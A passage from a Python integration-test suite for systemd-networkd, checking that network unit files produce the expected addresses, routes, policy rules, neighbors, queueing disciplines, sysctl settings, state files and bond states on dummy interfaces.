self.wait_online(['test1:routable', 'l2tp-ses3:degraded', 'l2tp-ses4:degraded'])
output = check_output('ip l2tp show tunnel tunnel_id 10')
print(output)
self.assertRegex(output, "Tunnel 10, encap IP")
self.assertRegex(output, "From 192.168.30.100 to 192.168.30.101")
self.assertRegex(output, "Peer tunnel 12")
output = check_output('ip l2tp show session tid 10 session_id 25')
print(output)
self.assertRegex(output, "Session 25 in tunnel 10")
self.assertRegex(output, "Peer session 26, tunnel 12")
self.assertRegex(output, "interface name: l2tp-ses3")
output = check_output('ip l2tp show session tid 10 session_id 27')
print(output)
self.assertRegex(output, "Session 27 in tunnel 10")
self.assertRegex(output, "Peer session 28, tunnel 12")
self.assertRegex(output, "interface name: l2tp-ses4")
class NetworkdNetworkTests(unittest.TestCase, Utilities):
links = [
'bond199',
'dummy98',
'dummy99',
'gretun97',
'ip6gretun97',
'test1',
'veth99',
]
units = [
'11-dummy.netdev',
'12-dummy.netdev',
'23-active-slave.network',
'24-keep-configuration-static.network',
'24-search-domain.network',
'25-address-dad-veth-peer.network',
'25-address-dad-veth99.network',
'25-address-link-section.network',
'25-address-preferred-lifetime-zero.network',
'25-address-static.network',
'25-bind-carrier.network',
'25-bond-active-backup-slave.netdev',
'25-fibrule-invert.network',
'25-fibrule-port-range.network',
'25-gre-tunnel-remote-any.netdev',
'25-ip6gre-tunnel-remote-any.netdev',
'25-ipv6-address-label-section.network',
'25-link-local-addressing-no.network',
'25-link-local-addressing-yes.network',
'25-link-section-unmanaged.network',
'25-neighbor-section.network',
'25-neighbor-next.network',
'25-neighbor-ipv6.network',
'25-neighbor-ip-dummy.network',
'25-neighbor-ip.network',
'25-nexthop.network',
'25-qdisc-fq-codel.network',
'25-qdisc-netem-and-fqcodel.network',
'25-qdisc-tbf-and-sfq.network',
'25-route-ipv6-src.network',
'25-route-static.network',
'25-gateway-static.network',
'25-gateway-next-static.network',
'25-sysctl-disable-ipv6.network',
'25-sysctl.network',
'25-veth-peer.network',
'25-veth.netdev',
'26-link-local-addressing-ipv6.network',
'configure-without-carrier.network',
'routing-policy-rule-dummy98.network',
'routing-policy-rule-test1.network']
routing_policy_rule_tables = ['7', '8', '9']
routes = [['blackhole', '202.54.1.2'], ['unreachable', '202.54.1.3'], ['prohibit', '202.54.1.4']]
def setUp(self):
remove_routing_policy_rule_tables(self.routing_policy_rule_tables)
remove_routes(self.routes)
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_routing_policy_rule_tables(self.routing_policy_rule_tables)
remove_routes(self.routes)
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_address_static(self):
copy_unit_to_networkd_unit_path('25-address-static.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output('ip -4 address show dev dummy98')
print(output)
self.assertRegex(output, 'inet 10.1.2.3/16 brd 10.1.255.255 scope global dummy98')
self.assertRegex(output, 'inet 10.1.2.4/16 brd 10.1.255.255 scope global secondary dummy98')
self.assertRegex(output, 'inet 10.2.2.4/16 brd 10.2.255.255 scope global dummy98')
# invalid sections
self.assertNotRegex(output, '10.10.0.1/16')
self.assertNotRegex(output, '10.10.0.2/16')
output = check_output('ip -4 address show dev dummy98 label 32')
self.assertRegex(output, 'inet 10.3.2.3/16 brd 10.3.255.255 scope global 32')
output = check_output('ip -4 address show dev dummy98 label 33')
self.assertRegex(output, 'inet 10.4.2.3 peer 10.4.2.4/16 scope global 33')
output = check_output('ip -4 address show dev dummy98 label 34')
self.assertRegex(output, 'inet 192.168.[0-9]*.1/24 brd 192.168.[0-9]*.255 scope global 34')
output = check_output('ip -4 address show dev dummy98 label 35')
self.assertRegex(output, 'inet 172.[0-9]*.0.1/16 brd 172.[0-9]*.255.255 scope global 35')
output = check_output('ip -6 address show dev dummy98')
print(output)
self.assertRegex(output, 'inet6 2001:db8:0:f101::15/64 scope global')
self.assertRegex(output, 'inet6 2001:db8:0:f101::16/64 scope global')
self.assertRegex(output, 'inet6 2001:db8:0:f102::15/64 scope global')
self.assertRegex(output, 'inet6 2001:db8:0:f102::16/64 scope global')
self.assertRegex(output, 'inet6 2001:db8:0:f103::20 peer 2001:db8:0:f103::10/128 scope global')
self.assertRegex(output, 'inet6 fd[0-9a-f:]*1/64 scope global')
def test_address_preferred_lifetime_zero_ipv6(self):
copy_unit_to_networkd_unit_path('25-address-preferred-lifetime-zero.network', '12-dummy.netdev')
start_networkd(5)
self.wait_online(['dummy98:routable'])
output = check_output('ip address show dummy98')
print(output)
self.assertRegex(output, 'inet 10.2.3.4/16 brd 10.2.255.255 scope link deprecated dummy98')
self.assertRegex(output, 'inet6 2001:db8:0:f101::1/64 scope global')
output = check_output('ip route show dev dummy98')
print(output)
self.assertRegex(output, 'default via 20.20.20.1 proto static')
def test_address_dad(self):
copy_unit_to_networkd_unit_path('25-address-dad-veth99.network', '25-address-dad-veth-peer.network',
'25-veth.netdev')
start_networkd()
self.wait_online(['veth99:routable', 'veth-peer:degraded'])
output = check_output('ip -4 address show dev veth99')
print(output)
self.assertRegex(output, '192.168.100.10/24')
output = check_output('ip -4 address show dev veth-peer')
print(output)
self.assertNotRegex(output, '192.168.100.10/24')
def test_configure_without_carrier(self):
copy_unit_to_networkd_unit_path('configure-without-carrier.network', '11-dummy.netdev')
start_networkd()
self.wait_online(['test1:routable'])
output = check_output(*networkctl_cmd, 'status', 'test1', env=env)
print(output)
self.assertRegex(output, '192.168.0.15')
self.assertRegex(output, '192.168.0.1')
self.assertRegex(output, 'routable')
def test_routing_policy_rule(self):
copy_unit_to_networkd_unit_path('routing-policy-rule-test1.network', '11-dummy.netdev')
start_networkd()
self.wait_online(['test1:degraded'])
output = check_output('ip rule list iif test1 priority 111')
print(output)
self.assertRegex(output, '111:')
self.assertRegex(output, 'from 192.168.100.18')
self.assertRegex(output, r'tos (0x08|throughput)\s')
self.assertRegex(output, 'iif test1')
self.assertRegex(output, 'oif test1')
self.assertRegex(output, 'lookup 7')
output = check_output('ip rule list iif test1 priority 101')
print(output)
self.assertRegex(output, '101:')
self.assertRegex(output, 'from all')
self.assertRegex(output, 'iif test1')
self.assertRegex(output, 'lookup 9')
output = check_output('ip -6 rule list iif test1 priority 100')
print(output)
self.assertRegex(output, '100:')
self.assertRegex(output, 'from all')
self.assertRegex(output, 'iif test1')
self.assertRegex(output, 'lookup 8')
output = check_output('ip -6 rule list iif test1 priority 101')
print(output)
self.assertRegex(output, '101:')
self.assertRegex(output, 'from all')
self.assertRegex(output, 'iif test1')
self.assertRegex(output, 'lookup 9')
def test_routing_policy_rule_issue_11280(self):
copy_unit_to_networkd_unit_path('routing-policy-rule-test1.network', '11-dummy.netdev',
'routing-policy-rule-dummy98.network', '12-dummy.netdev')
for trial in range(3):
# Remove state files only first time
start_networkd(3)
self.wait_online(['test1:degraded', 'dummy98:degraded'])
time.sleep(1)
output = check_output('ip rule list table 7')
print(output)
self.assertRegex(output, '111: from 192.168.100.18 tos (0x08|throughput) iif test1 oif test1 lookup 7')
output = check_output('ip rule list table 8')
print(output)
self.assertRegex(output, '112: from 192.168.101.18 tos (0x08|throughput) iif dummy98 oif dummy98 lookup 8')
stop_networkd(remove_state_files=False)
@expectedFailureIfRoutingPolicyPortRangeIsNotAvailable()
def test_routing_policy_rule_port_range(self):
copy_unit_to_networkd_unit_path('25-fibrule-port-range.network', '11-dummy.netdev')
start_networkd()
self.wait_online(['test1:degraded'])
output = check_output('ip rule')
print(output)
self.assertRegex(output, '111')
self.assertRegex(output, 'from 192.168.100.18')
self.assertRegex(output, '1123-1150')
self.assertRegex(output, '3224-3290')
self.assertRegex(output, 'tcp')
self.assertRegex(output, 'lookup 7')
@expectedFailureIfRoutingPolicyIPProtoIsNotAvailable()
def test_routing_policy_rule_invert(self):
copy_unit_to_networkd_unit_path('25-fibrule-invert.network', '11-dummy.netdev')
start_networkd()
self.wait_online(['test1:degraded'])
output = check_output('ip rule')
print(output)
self.assertRegex(output, '111')
self.assertRegex(output, 'not.*?from.*?192.168.100.18')
self.assertRegex(output, 'tcp')
self.assertRegex(output, 'lookup 7')
def test_route_static(self):
copy_unit_to_networkd_unit_path('25-route-static.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output(*networkctl_cmd, 'status', 'dummy98', env=env)
print(output)
print('### ip -6 route show dev dummy98')
output = check_output('ip -6 route show dev dummy98')
print(output)
self.assertRegex(output, '2001:1234:5:8fff:ff:ff:ff:ff proto static')
self.assertRegex(output, '2001:1234:5:8f63::1 proto kernel')
print('### ip -6 route show dev dummy98 default')
output = check_output('ip -6 route show dev dummy98 default')
print(output)
self.assertRegex(output, 'default via 2001:1234:5:8fff:ff:ff:ff:ff proto static metric 1024 pref medium')
print('### ip -4 route show dev dummy98')
output = check_output('ip -4 route show dev dummy98')
print(output)
self.assertRegex(output, '149.10.124.48/28 proto kernel scope link src 149.10.124.58')
self.assertRegex(output, '149.10.124.64 proto static scope link')
self.assertRegex(output, '169.254.0.0/16 proto static scope link metric 2048')
self.assertRegex(output, '192.168.1.1 proto static initcwnd 20')
self.assertRegex(output, '192.168.1.2 proto static initrwnd 30')
self.assertRegex(output, 'multicast 149.10.123.4 proto static')
print('### ip -4 route show dev dummy98 default')
output = check_output('ip -4 route show dev dummy98 default')
print(output)
self.assertRegex(output, 'default via 149.10.125.65 proto static onlink')
self.assertRegex(output, 'default via 149.10.124.64 proto static')
self.assertRegex(output, 'default proto static')
print('### ip -4 route show table local dev dummy98')
output = check_output('ip -4 route show table local dev dummy98')
print(output)
self.assertRegex(output, 'local 149.10.123.1 proto static scope host')
self.assertRegex(output, 'anycast 149.10.123.2 proto static scope link')
self.assertRegex(output, 'broadcast 149.10.123.3 proto static scope link')
print('### ip route show type blackhole')
output = check_output('ip route show type blackhole')
print(output)
self.assertRegex(output, 'blackhole 202.54.1.2 proto static')
print('### ip route show type unreachable')
output = check_output('ip route show type unreachable')
print(output)
self.assertRegex(output, 'unreachable 202.54.1.3 proto static')
print('### ip route show type prohibit')
output = check_output('ip route show type prohibit')
print(output)
self.assertRegex(output, 'prohibit 202.54.1.4 proto static')
print('### ip route show 192.168.10.1')
output = check_output('ip route show 192.168.10.1')
print(output)
self.assertRegex(output, '192.168.10.1 proto static')
self.assertRegex(output, 'nexthop via 149.10.124.59 dev dummy98 weight 10')
self.assertRegex(output, 'nexthop via 149.10.124.60 dev dummy98 weight 5')
print('### ip route show 192.168.10.2')
output = check_output('ip route show 192.168.10.2')
print(output)
# old ip command does not show IPv6 gateways...
self.assertRegex(output, '192.168.10.2 proto static')
self.assertRegex(output, 'nexthop')
self.assertRegex(output, 'dev dummy98 weight 10')
self.assertRegex(output, 'dev dummy98 weight 5')
print('### ip -6 route show 2001:1234:5:7fff:ff:ff:ff:ff')
output = check_output('ip -6 route show 2001:1234:5:7fff:ff:ff:ff:ff')
print(output)
# old ip command does not show 'nexthop' keyword and weight...
self.assertRegex(output, '2001:1234:5:7fff:ff:ff:ff:ff')
self.assertRegex(output, 'via 2001:1234:5:8fff:ff:ff:ff:ff dev dummy98')
self.assertRegex(output, 'via 2001:1234:5:9fff:ff:ff:ff:ff dev dummy98')
def test_gateway_reconfigure(self):
copy_unit_to_networkd_unit_path('25-gateway-static.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:routable'])
print('### ip -4 route show dev dummy98 default')
output = check_output('ip -4 route show dev dummy98 default')
print(output)
self.assertRegex(output, 'default via 149.10.124.59 proto static')
self.assertNotRegex(output, '149.10.124.60')
remove_unit_from_networkd_path(['25-gateway-static.network'])
copy_unit_to_networkd_unit_path('25-gateway-next-static.network')
restart_networkd(3)
self.wait_online(['dummy98:routable'])
print('### ip -4 route show dev dummy98 default')
output = check_output('ip -4 route show dev dummy98 default')
print(output)
self.assertNotRegex(output, '149.10.124.59')
self.assertRegex(output, 'default via 149.10.124.60 proto static')
def test_ip_route_ipv6_src_route(self):
# a dummy device does not make the addresses go through tentative state, so we
# reuse a bond from an earlier test, which does make the addresses go through
# tentative state, and do our test on that
copy_unit_to_networkd_unit_path('23-active-slave.network', '25-route-ipv6-src.network', '25-bond-active-backup-slave.netdev', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:enslaved', 'bond199:routable'])
output = check_output('ip -6 route list dev bond199')
print(output)
self.assertRegex(output, 'abcd::/16')
self.assertRegex(output, 'src')
self.assertRegex(output, '2001:1234:56:8f63::2')
def test_ip_link_mac_address(self):
copy_unit_to_networkd_unit_path('25-address-link-section.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:degraded'])
output = check_output('ip link show dummy98')
print(output)
self.assertRegex(output, '00:01:02:aa:bb:cc')
def test_ip_link_unmanaged(self):
copy_unit_to_networkd_unit_path('25-link-section-unmanaged.network', '12-dummy.netdev')
start_networkd(5)
self.check_link_exists('dummy98')
self.check_operstate('dummy98', 'off', setup_state='unmanaged')
def test_ipv6_address_label(self):
copy_unit_to_networkd_unit_path('25-ipv6-address-label-section.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:degraded'])
output = check_output('ip addrlabel list')
print(output)
self.assertRegex(output, '2004:da8:1::/64')
def test_neighbor_section(self):
copy_unit_to_networkd_unit_path('25-neighbor-section.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:degraded'], timeout='40s')
print('### ip neigh list dev dummy98')
output = check_output('ip neigh list dev dummy98')
print(output)
self.assertRegex(output, '192.168.10.1.*00:00:5e:00:02:65.*PERMANENT')
self.assertRegex(output, '2004:da8:1::1.*00:00:5e:00:02:66.*PERMANENT')
def test_neighbor_reconfigure(self):
copy_unit_to_networkd_unit_path('25-neighbor-section.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:degraded'], timeout='40s')
print('### ip neigh list dev dummy98')
output = check_output('ip neigh list dev dummy98')
print(output)
self.assertRegex(output, '192.168.10.1.*00:00:5e:00:02:65.*PERMANENT')
self.assertRegex(output, '2004:da8:1::1.*00:00:5e:00:02:66.*PERMANENT')
remove_unit_from_networkd_path(['25-neighbor-section.network'])
copy_unit_to_networkd_unit_path('25-neighbor-next.network')
restart_networkd(3)
self.wait_online(['dummy98:degraded'], timeout='40s')
print('### ip neigh list dev dummy98')
output = check_output('ip neigh list dev dummy98')
print(output)
self.assertNotRegex(output, '192.168.10.1.*00:00:5e:00:02:65.*PERMANENT')
self.assertRegex(output, '192.168.10.1.*00:00:5e:00:02:66.*PERMANENT')
self.assertNotRegex(output, '2004:da8:1::1.*PERMANENT')
def test_neighbor_gre(self):
copy_unit_to_networkd_unit_path('25-neighbor-ip.network', '25-neighbor-ipv6.network', '25-neighbor-ip-dummy.network',
'12-dummy.netdev', '25-gre-tunnel-remote-any.netdev', '25-ip6gre-tunnel-remote-any.netdev')
start_networkd()
self.wait_online(['dummy98:degraded', 'gretun97:routable', 'ip6gretun97:routable'], timeout='40s')
output = check_output('ip neigh list dev gretun97')
print(output)
self.assertRegex(output, '10.0.0.22 lladdr 10.65.223.239 PERMANENT')
output = check_output('ip neigh list dev ip6gretun97')
print(output)
self.assertRegex(output, '2001:db8:0:f102::17 lladdr 2a:?00:ff:?de:45:?67:ed:?de:[0:]*:49:?88 PERMANENT')
def test_link_local_addressing(self):
copy_unit_to_networkd_unit_path('25-link-local-addressing-yes.network', '11-dummy.netdev',
'25-link-local-addressing-no.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['test1:degraded', 'dummy98:carrier'])
output = check_output('ip address show dev test1')
print(output)
self.assertRegex(output, 'inet .* scope link')
self.assertRegex(output, 'inet6 .* scope link')
output = check_output('ip address show dev dummy98')
print(output)
self.assertNotRegex(output, 'inet6* .* scope link')
'''
Documentation/networking/ip-sysctl.txt
addr_gen_mode - INTEGER
Defines how link-local and autoconf addresses are generated.
0: generate address based on EUI64 (default)
1: do no generate a link-local address, use EUI64 for addresses generated
from autoconf
2: generate stable privacy addresses, using the secret from
stable_secret (RFC7217)
3: generate stable privacy addresses, using a random secret if unset
'''
test1_addr_gen_mode = ''
if os.path.exists(os.path.join(os.path.join(network_sysctl_ipv6_path, 'test1'), 'stable_secret')):
with open(os.path.join(os.path.join(network_sysctl_ipv6_path, 'test1'), 'stable_secret')) as f:
try:
f.readline()
except IOError:
# if stable_secret is unset, then EIO is returned
test1_addr_gen_mode = '0'
else:
test1_addr_gen_mode = '2'
else:
test1_addr_gen_mode = '0'
if os.path.exists(os.path.join(os.path.join(network_sysctl_ipv6_path, 'test1'), 'addr_gen_mode')):
self.assertEqual(read_ipv6_sysctl_attr('test1', 'addr_gen_mode'), test1_addr_gen_mode)
if os.path.exists(os.path.join(os.path.join(network_sysctl_ipv6_path, 'dummy98'), 'addr_gen_mode')):
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'addr_gen_mode'), '1')
def test_link_local_addressing_remove_ipv6ll(self):
copy_unit_to_networkd_unit_path('26-link-local-addressing-ipv6.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:degraded'])
output = check_output('ip address show dev dummy98')
print(output)
self.assertRegex(output, 'inet6 .* scope link')
copy_unit_to_networkd_unit_path('25-link-local-addressing-no.network')
restart_networkd(1)
self.wait_online(['dummy98:carrier'])
output = check_output('ip address show dev dummy98')
print(output)
self.assertNotRegex(output, 'inet6* .* scope link')
def test_sysctl(self):
copy_unit_to_networkd_unit_path('25-sysctl.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:degraded'])
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'forwarding'), '1')
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'use_tempaddr'), '2')
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'dad_transmits'), '3')
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'hop_limit'), '5')
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'proxy_ndp'), '1')
self.assertEqual(read_ipv4_sysctl_attr('dummy98', 'forwarding'),'1')
self.assertEqual(read_ipv4_sysctl_attr('dummy98', 'proxy_arp'), '1')
def test_sysctl_disable_ipv6(self):
copy_unit_to_networkd_unit_path('25-sysctl-disable-ipv6.network', '12-dummy.netdev')
print('## Disable ipv6')
check_output('sysctl net.ipv6.conf.all.disable_ipv6=1')
check_output('sysctl net.ipv6.conf.default.disable_ipv6=1')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output('ip -4 address show dummy98')
print(output)
self.assertRegex(output, 'inet 10.2.3.4/16 brd 10.2.255.255 scope global dummy98')
output = check_output('ip -6 address show dummy98')
print(output)
self.assertRegex(output, 'inet6 2607:5300:203:3906::/64 scope global')
self.assertRegex(output, 'inet6 .* scope link')
output = check_output('ip -4 route show dev dummy98')
print(output)
self.assertEqual(output, '10.2.0.0/16 proto kernel scope link src 10.2.3.4')
output = check_output('ip -6 route show dev dummy98')
print(output)
self.assertRegex(output, 'default via 2607:5300:203:39ff:ff:ff:ff:ff proto static')
check_output('ip link del dummy98')
print('## Enable ipv6')
check_output('sysctl net.ipv6.conf.all.disable_ipv6=0')
check_output('sysctl net.ipv6.conf.default.disable_ipv6=0')
restart_networkd(3)
self.wait_online(['dummy98:routable'])
output = check_output('ip -4 address show dummy98')
print(output)
self.assertRegex(output, 'inet 10.2.3.4/16 brd 10.2.255.255 scope global dummy98')
output = check_output('ip -6 address show dummy98')
print(output)
self.assertRegex(output, 'inet6 2607:5300:203:3906::/64 scope global')
self.assertRegex(output, 'inet6 .* scope link')
output = check_output('ip -4 route show dev dummy98')
print(output)
self.assertEqual(output, '10.2.0.0/16 proto kernel scope link src 10.2.3.4')
output = check_output('ip -6 route show dev dummy98')
print(output)
self.assertRegex(output, 'default via 2607:5300:203:39ff:ff:ff:ff:ff proto static')
def test_bind_carrier(self):
check_output('ip link add dummy98 type dummy')
check_output('ip link set dummy98 up')
time.sleep(2)
copy_unit_to_networkd_unit_path('25-bind-carrier.network', '11-dummy.netdev')
start_networkd()
self.wait_online(['test1:routable'])
output = check_output('ip address show test1')
print(output)
self.assertRegex(output, 'UP,LOWER_UP')
self.assertRegex(output, 'inet 192.168.10.30/24 brd 192.168.10.255 scope global test1')
self.check_operstate('test1', 'routable')
check_output('ip link add dummy99 type dummy')
check_output('ip link set dummy99 up')
time.sleep(2)
output = check_output('ip address show test1')
print(output)
self.assertRegex(output, 'UP,LOWER_UP')
self.assertRegex(output, 'inet 192.168.10.30/24 brd 192.168.10.255 scope global test1')
self.check_operstate('test1', 'routable')
check_output('ip link del dummy98')
time.sleep(2)
output = check_output('ip address show test1')
print(output)
self.assertRegex(output, 'UP,LOWER_UP')
self.assertRegex(output, 'inet 192.168.10.30/24 brd 192.168.10.255 scope global test1')
self.check_operstate('test1', 'routable')
check_output('ip link set dummy99 down')
time.sleep(2)
output = check_output('ip address show test1')
print(output)
self.assertNotRegex(output, 'UP,LOWER_UP')
self.assertRegex(output, 'DOWN')
self.assertNotRegex(output, '192.168.10')
self.check_operstate('test1', 'off')
check_output('ip link set dummy99 up')
time.sleep(2)
output = check_output('ip address show test1')
print(output)
self.assertRegex(output, 'UP,LOWER_UP')
self.assertRegex(output, 'inet 192.168.10.30/24 brd 192.168.10.255 scope global test1')
self.check_operstate('test1', 'routable')
def test_domain(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', '24-search-domain.network')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output(*networkctl_cmd, 'status', 'dummy98', env=env)
print(output)
self.assertRegex(output, 'Address: 192.168.42.100')
self.assertRegex(output, 'DNS: 192.168.42.1')
self.assertRegex(output, 'Search Domains: one')
def test_keep_configuration_static(self):
check_output('systemctl stop systemd-networkd')
check_output('ip link add name dummy98 type dummy')
check_output('ip address add 10.1.2.3/16 dev dummy98')
check_output('ip address add 10.2.3.4/16 dev dummy98 valid_lft 600 preferred_lft 500')
output = check_output('ip address show dummy98')
print(output)
self.assertRegex(output, 'inet 10.1.2.3/16 scope global dummy98')
self.assertRegex(output, 'inet 10.2.3.4/16 scope global dynamic dummy98')
output = check_output('ip route show dev dummy98')
print(output)
copy_unit_to_networkd_unit_path('24-keep-configuration-static.network')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output('ip address show dummy98')
print(output)
self.assertRegex(output, 'inet 10.1.2.3/16 scope global dummy98')
self.assertNotRegex(output, 'inet 10.2.3.4/16 scope global dynamic dummy98')
@expectedFailureIfNexthopIsNotAvailable()
def test_nexthop(self):
copy_unit_to_networkd_unit_path('25-nexthop.network', '25-veth.netdev', '25-veth-peer.network')
start_networkd()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip nexthop list dev veth99')
print(output)
self.assertRegex(output, '192.168.5.1')
def test_qdisc(self):
copy_unit_to_networkd_unit_path('25-qdisc-netem-and-fqcodel.network', '12-dummy.netdev',
'25-qdisc-tbf-and-sfq.network', '11-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:routable', 'test1:routable'])
output = check_output('tc qdisc show dev dummy98')
print(output)
self.assertRegex(output, 'qdisc netem')
self.assertRegex(output, 'limit 100 delay 50.0ms 10.0ms loss 20%')
self.assertRegex(output, 'qdisc fq_codel')
self.assertRegex(output, 'limit 20480p flows 2048 quantum 1400 target 10.0ms ce_threshold 100.0ms interval 200.0ms memory_limit 64Mb ecn')
output = check_output('tc qdisc show dev test1')
print(output)
self.assertRegex(output, 'qdisc tbf')
self.assertRegex(output, 'rate 1Gbit burst 5000b peakrate 100Gbit minburst 987500b lat 70.0ms')
self.assertRegex(output, 'qdisc sfq')
self.assertRegex(output, 'perturb 5sec')
def test_qdisc2(self):
copy_unit_to_networkd_unit_path('25-qdisc-fq-codel.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output('tc qdisc show dev dummy98')
print(output)
self.assertRegex(output, 'qdisc fq')
self.assertRegex(output, 'limit 1000p flow_limit 200p buckets 512 orphan_mask 511 quantum 1500 initial_quantum 13000 maxrate 1Mbit')
self.assertRegex(output, 'qdisc codel')
self.assertRegex(output, 'limit 2000p target 10.0ms ce_threshold 100.0ms interval 50.0ms ecn')
class NetworkdStateFileTests(unittest.TestCase, Utilities):
links = [
'dummy98',
]
units = [
'12-dummy.netdev',
'state-file-tests.network',
]
def setUp(self):
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_state_file(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'state-file-tests.network')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output(*networkctl_cmd, '--no-legend', 'list', 'dummy98', env=env)
print(output)
ifindex = output.split()[0]
path = os.path.join('/run/systemd/netif/links/', ifindex)
self.assertTrue(os.path.exists(path))
time.sleep(2)
with open(path) as f:
data = f.read()
self.assertRegex(data, r'ADMIN_STATE=configured')
self.assertRegex(data, r'OPER_STATE=routable')
self.assertRegex(data, r'REQUIRED_FOR_ONLINE=yes')
self.assertRegex(data, r'REQUIRED_OPER_STATE_FOR_ONLINE=routable')
self.assertRegex(data, r'NETWORK_FILE=/run/systemd/network/state-file-tests.network')
self.assertRegex(data, r'DNS=10.10.10.10 10.10.10.11')
self.assertRegex(data, r'NTP=0.fedora.pool.ntp.org 1.fedora.pool.ntp.org')
self.assertRegex(data, r'DOMAINS=hogehoge')
self.assertRegex(data, r'ROUTE_DOMAINS=foofoo')
self.assertRegex(data, r'LLMNR=no')
self.assertRegex(data, r'MDNS=yes')
self.assertRegex(data, r'DNSSEC=no')
self.assertRegex(data, r'ADDRESSES=192.168.(10.10|12.12)/24 192.168.(12.12|10.10)/24')
check_output(*resolvectl_cmd, 'dns', 'dummy98', '10.10.10.12', '10.10.10.13', env=env)
check_output(*resolvectl_cmd, 'domain', 'dummy98', 'hogehogehoge', '~foofoofoo', env=env)
check_output(*resolvectl_cmd, 'llmnr', 'dummy98', 'yes', env=env)
check_output(*resolvectl_cmd, 'mdns', 'dummy98', 'no', env=env)
check_output(*resolvectl_cmd, 'dnssec', 'dummy98', 'yes', env=env)
check_output(*timedatectl_cmd, 'ntp-servers', 'dummy98', '2.fedora.pool.ntp.org', '3.fedora.pool.ntp.org', env=env)
time.sleep(2)
with open(path) as f:
data = f.read()
self.assertRegex(data, r'DNS=10.10.10.12 10.10.10.13')
self.assertRegex(data, r'NTP=2.fedora.pool.ntp.org 3.fedora.pool.ntp.org')
self.assertRegex(data, r'DOMAINS=hogehogehoge')
self.assertRegex(data, r'ROUTE_DOMAINS=foofoofoo')
self.assertRegex(data, r'LLMNR=yes')
self.assertRegex(data, r'MDNS=no')
self.assertRegex(data, r'DNSSEC=yes')
check_output(*timedatectl_cmd, 'revert', 'dummy98', env=env)
time.sleep(2)
with open(path) as f:
data = f.read()
self.assertRegex(data, r'DNS=10.10.10.12 10.10.10.13')
self.assertRegex(data, r'NTP=0.fedora.pool.ntp.org 1.fedora.pool.ntp.org')
self.assertRegex(data, r'DOMAINS=hogehogehoge')
self.assertRegex(data, r'ROUTE_DOMAINS=foofoofoo')
self.assertRegex(data, r'LLMNR=yes')
self.assertRegex(data, r'MDNS=no')
self.assertRegex(data, r'DNSSEC=yes')
check_output(*resolvectl_cmd, 'revert', 'dummy98', env=env)
time.sleep(2)
with open(path) as f:
data = f.read()
self.assertRegex(data, r'DNS=10.10.10.10 10.10.10.11')
self.assertRegex(data, r'NTP=0.fedora.pool.ntp.org 1.fedora.pool.ntp.org')
self.assertRegex(data, r'DOMAINS=hogehoge')
self.assertRegex(data, r'ROUTE_DOMAINS=foofoo')
self.assertRegex(data, r'LLMNR=no')
self.assertRegex(data, r'MDNS=yes')
self.assertRegex(data, r'DNSSEC=no')
class NetworkdBondTests(unittest.TestCase, Utilities):
links = [
'bond199',
'bond99',
'dummy98',
'test1']
units = [
'11-dummy.netdev',
'12-dummy.netdev',
'23-active-slave.network',
'23-bond199.network',
'23-primary-slave.network',
'25-bond-active-backup-slave.netdev',
'25-bond.netdev',
'bond99.network',
'bond-slave.network']
def setUp(self):
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_bond_active_slave(self):
copy_unit_to_networkd_unit_path('23-active-slave.network', '23-bond199.network', '25-bond-active-backup-slave.netdev', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:enslaved', 'bond199:degraded'])
output = check_output('ip -d link show bond199')
print(output)
self.assertRegex(output, 'active_slave dummy98')
def test_bond_primary_slave(self):
copy_unit_to_networkd_unit_path('23-primary-slave.network', '23-bond199.network', '25-bond-active-backup-slave.netdev', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:enslaved', 'bond199:degraded'])
output = check_output('ip -d link show bond199')
print(output)
self.assertRegex(output, 'primary dummy98')
def test_bond_operstate(self):
copy_unit_to_networkd_unit_path('25-bond.netdev', '11-dummy.netdev', '12-dummy.netdev',
'bond99.network','bond-slave.network')
start_networkd()
self.wait_online(['dummy98:enslaved', 'test1:enslaved', 'bond99:routable'])
output = check_output('ip -d link show dummy98')
print(output)
self.assertRegex(output, 'SLAVE,UP,LOWER_UP')
output = check_output('ip -d link show test1')
print(output)
self.assertRegex(output, 'SLAVE,UP,LOWER_UP')
output = check_output('ip -d link show bond99')
print(output)
self.assertRegex(output, 'MASTER,UP,LOWER_UP')
self.check_operstate('dummy98', 'enslaved')
self.check_operstate('test1', 'enslaved')
self.check_operstate('bond99', 'routable')
check_output('ip link set dummy98 down')
time.sleep(2)
self.check_operstate('dummy98', 'off')
self.check_operstate('test1', 'enslaved')
self.check_operstate('bond99', 'degraded-carrier')
check_output('ip link set dummy98 up')
time.sleep(2)
self.check_operstate('dummy98', 'enslaved')
